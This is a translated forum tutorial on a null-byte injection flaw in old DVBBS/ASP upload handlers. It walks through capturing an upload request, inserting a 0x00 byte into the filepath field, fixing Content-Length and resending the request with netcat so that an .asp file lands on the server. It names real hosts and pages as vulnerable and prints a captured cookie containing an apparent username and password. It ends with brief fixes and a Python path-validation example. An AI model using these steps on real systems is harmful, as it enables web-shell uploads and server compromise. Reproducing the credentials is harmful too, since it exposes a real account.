The end of the upload vulnerability

xiaoxiao  2021-03-06

I. Foreword

*** The principle of this upload vulnerability applies only to ASP and PHP scripts that accept uploads submitted as a form. ***

NC (Netcat)

Used to submit the packet.

At the DOS prompt:

nc -vv www.***.com 80 < 1.txt

-vv: verbose, shows what the server returns

80: the web server port

1.txt: the packet you want to send

(For more usage, see the posts in this forum section.)

WSE (WSockExpert)

Monitors this machine and captures the packets IE submits.

(If you don't have it, search online; there are N copies.)

II. Principle of the vulnerability

Premises for the following example:

WWW host: www.***.com

BBS path: /bbs/

This vulnerability came out of studying upload code found on the Internet; some programming experience is recommended.

Look at DVBBS's upfile.asp; there is no need to understand all of it.

upfile generates a form as follows.

Variables used:

FilePath   default UploadFace   type hidden

act        default upload       type hidden

file1 is the file you want to upload.

The key is the FilePath variable!

By default our file is uploaded to www.***.com/bbs/UploadFace/

The file is named after the upload time; this is the line in upfile that does it:

FileName = FormPath & Year(Now) & Month(Now) & Day(Now) & Hour(Now) & Minute(Now) & Second(Now) & Rannum & "." & FileExt

-----------------------------

Anyone who has used C knows that a string in memory ends with a "\0" terminator.

char data[] = "BBS"

This data array has length 4: B B S \0

What if we construct FilePath as follows?

FilePath = "/newmm.asp\0"

Suppose we upload at 2004-09-24 08:24.

Without the change, the file lands at:

http://www.***.com/bbs/uploadface/200409240824.jpg

With the FilePath we constructed:

http://www.***.com/newmm.asp\0/200409240824.jpg

When the server receives the FilePath data it reads newmm.asp and then hits the \0, which tells it that the FilePath data has ended.

So the file we upload, for example C:\1.asp, ends up at:

http://www.***.com/newmm.asp

III. Later supplement

This vulnerability has been published on many websites, but not many sites actually filter and process FilePath; most of them just added N more hidden fields.

Upload tools (for old hands) change the FilePath variable for you ... but the most basic thing has not changed.

And similar vulnerabilities exist in plug-ins on websites, so I don't want to rely on any particular special tool:

change the filepath variable you captured with WSE, then submit it with NC . . .

Even if they add N hidden variables, it doesn't matter.

Of course, if very strict filtering is applied to FilePath, these theories will be pronounced dead

and our new theory will be born!

IV. List of vulnerabilities

http://dvd.3800cc.com/dispbbs.asp?boardid=20&idd=5369

http://dvd.3800cc.com/dispbbs.asp?boardid=20&ody=5530

http://dvd.3800cc.com/dispbbs.asp?boardid=20&id=5531

Http://dvd.3800cc.com/dispbbs.asp?boardid=20&id=5693

Http://dvd.3800cc.com/dispbbs.asp?boardid=20&id=5731

http://dvd.3800cc.com/dispbbs.asp?boardid=20&id=5746

Connect to an external host:

nc [-options] hostname port[s] [ports] ...

Listen on the local host:

nc -l -p port [options] [hostname] [port]

Options:

    -d              detach from console, stealth mode
    -e prog         inbound program to exec [dangerous!!]
    -g gateway      source-routing hop point[s], up to 8
    -G num          source-routing pointer: 4, 8, 12, ...
    -h              this cruft
    -i secs         delay interval for lines sent, ports scanned
    -l              listen mode, for inbound connects
    -L              listen harder, re-listen on socket close
    -n              numeric-only IP addresses, no DNS
    -o file         hex dump of traffic
    -p port         local port number
    -r              randomize local and remote ports
    -s addr         local source address
    -t              answer TELNET negotiation
    -u              UDP mode
    -v              verbose [use twice to be more verbose]
    -w secs         timeout for connects and final net reads
    -z              zero-I/O mode [used for scanning]

Port numbers can be individual or ranges: m-n [inclusive]

Detailed example:

-----------------------------

1. Capture with WSE (save as 1.txt):

POST /bbs/upphoto/upfile.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-power, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.xin126.com/bbs/upphoto/upload.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=-----------7D423A138D0278
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: www.xin126.com
Content-Length: 1969
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDACCCCDCS=NJHCPHPALBCANKOBECHKJANF; isCome=1; GAMVANCOOKIES=1; regTime=2004%2D9%2D24 3%3A39%3A37; username=szjwwwww; pass=5211314; dl=0; userID=62; ltStyle=0; loginTry=1; Userpass=EB03F6C72908FD84

-----------------------------7D423A138D0278
Content-Disposition: form-data; name="filepath"

../Medias/myphoto/
-----------------------------7D423A138D0278
...
upload
-----------------------------7D423A138D0278--

2. Open 1.txt in UltraEdit and change the data:

......
-----------------------------7D423A138D0278
Content-Disposition: form-data; name="filepath"

/newmm.asp█ <=== the black block stands for a space, 0x20; change it to 0x00.
......
-----------------------------

3. Recalculate the length, then submit with NC:

nc -vv www.xin126.com 80 < 1.txt

UltraEdit is a hex editor; you can download it online.

We mainly use it to write that terminator: \0 ====> in hex: 0x00 or 00H

In fact, all you change is to add a 00 at the very end of FilePath.

Recalculating the length ===> after you change the filepath, the packet is certainly longer or shorter than before, so this header must be updated:

......

Host: www.xin126.com

Content-Length: 1969 <====== this one

Connection: Keep-Alive

Cache-Control: no-cache ......

How to count? Each letter or digit counts as 1.

Solutions to the upload vulnerability (for reference only):

1. Uploads generally treat the upload path as a variable

===> our strategy is to turn the filepath into a constant . . .

This method is currently the most effective (in my opinion).

2. Strengthen the handling of \0: the parser used to stop right there; if it instead keeps reading up to the place where the next variable begins, it is OK.
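As an added illustration of the two fixes (this is not code from the post or from DVBBS, and it is Python rather than ASP), the following parser reads each multipart field up to the next boundary instead of up to the first 0x00, shows what a NUL-terminated string consumer would have seen, and builds the storage path only from a server-side constant plus the upload time. The field names follow upfile.asp; the upload directory, the extension whitelist, the sample bodies and the function names are assumptions made for the example.

```python
import re
import time

# Fix 1 from the post: the upload directory is a server-side constant and the
# client's "filepath" field is never used. Directory and whitelist are assumed.
UPLOAD_DIR = "/bbs/UploadFace/"
ALLOWED_EXT = {"jpg", "jpeg", "gif", "png"}

# Boundary string taken from the captured request above; the bodies built
# with it below are constructed samples, not the original capture.
BOUNDARY = b"-----------7D423A138D0278"


def build_body(filepath_value: bytes, filename: str) -> bytes:
    """Constructed multipart/form-data body with the three fields upfile.asp
    expects: filepath (client-controlled), act, and the file part."""
    return (
        b"--" + BOUNDARY + b"\r\n"
        + b'Content-Disposition: form-data; name="filepath"\r\n\r\n'
        + filepath_value + b"\r\n"
        + b"--" + BOUNDARY + b"\r\n"
        + b'Content-Disposition: form-data; name="act"\r\n\r\n'
        + b"upload\r\n"
        + b"--" + BOUNDARY + b"\r\n"
        + b'Content-Disposition: form-data; name="file1"; filename="'
        + filename.encode() + b'"\r\n'
        + b"Content-Type: application/octet-stream\r\n\r\n"
        + b"\xff\xd8\xff\xe0 constructed image bytes\r\n"
        + b"--" + BOUNDARY + b"--\r\n"
    )


def parse_multipart(body: bytes, boundary: bytes) -> dict:
    """Split the body into {field name: (filename or None, raw bytes)}.
    Each part is read up to the next boundary delimiter, so an embedded
    0x00 does not end the field early (fix 2 from the post)."""
    fields = {}
    delim = b"--" + boundary
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):
            break  # closing delimiter "--boundary--"
        head, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):
            data = data[:-2]  # CRLF that precedes the next delimiter
        name = re.search(rb'[; ]name="([^"]*)"', head)
        fname = re.search(rb'filename="([^"]*)"', head)
        if name:
            fields[name.group(1).decode()] = (
                fname.group(1).decode() if fname else None, data)
    return fields


def c_string_view(value: bytes) -> bytes:
    """What a NUL-terminated string consumer (C strlen-style, or the ASP
    file handling the post describes) sees: everything after the first
    0x00 is invisible to it."""
    nul = value.find(b"\x00")
    return value if nul < 0 else value[:nul]


def validate_upload(fields: dict, now: float):
    """Server-side decision. Returns (accepted, detail); on success detail
    is the storage path, built only from UPLOAD_DIR and the upload time
    (the same time-based naming upfile.asp uses)."""
    for name, (fname, data) in fields.items():
        if b"\x00" in data or (fname is not None and "\x00" in fname):
            return False, "NUL byte in field %r" % name
    if "file1" not in fields or not fields["file1"][0]:
        return False, "no file part"
    fname = fields["file1"][0]
    ext = fname.rsplit(".", 1)[1].lower() if "." in fname else ""
    if ext not in ALLOWED_EXT:
        return False, "extension %r not allowed" % ext
    stamp = time.strftime("%Y%m%d%H%M%S", time.gmtime(now))
    return True, UPLOAD_DIR + stamp + "." + ext


if __name__ == "__main__":
    hostile = parse_multipart(build_body(b"/newmm.asp\x00/", "1.asp"), BOUNDARY)
    print("C-string view:", c_string_view(hostile["filepath"][1]))
    print("full field   :", hostile["filepath"][1])
    print("decision     :", validate_upload(hostile, 0))
    benign = parse_multipart(build_body(b"../Medias/myphoto/", "photo.jpg"), BOUNDARY)
    print("decision     :", validate_upload(benign, 0))
```

The two checks are independent: even if the NUL check were missing, the client's filepath never reaches the filesystem because the directory is a constant; even if the directory were taken from the client, the NUL check stops the truncation that turns "/newmm.asp\0/..." into "/newmm.asp".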

Please credit the original source when reposting: https://www.9cbs.com/read-101444.html
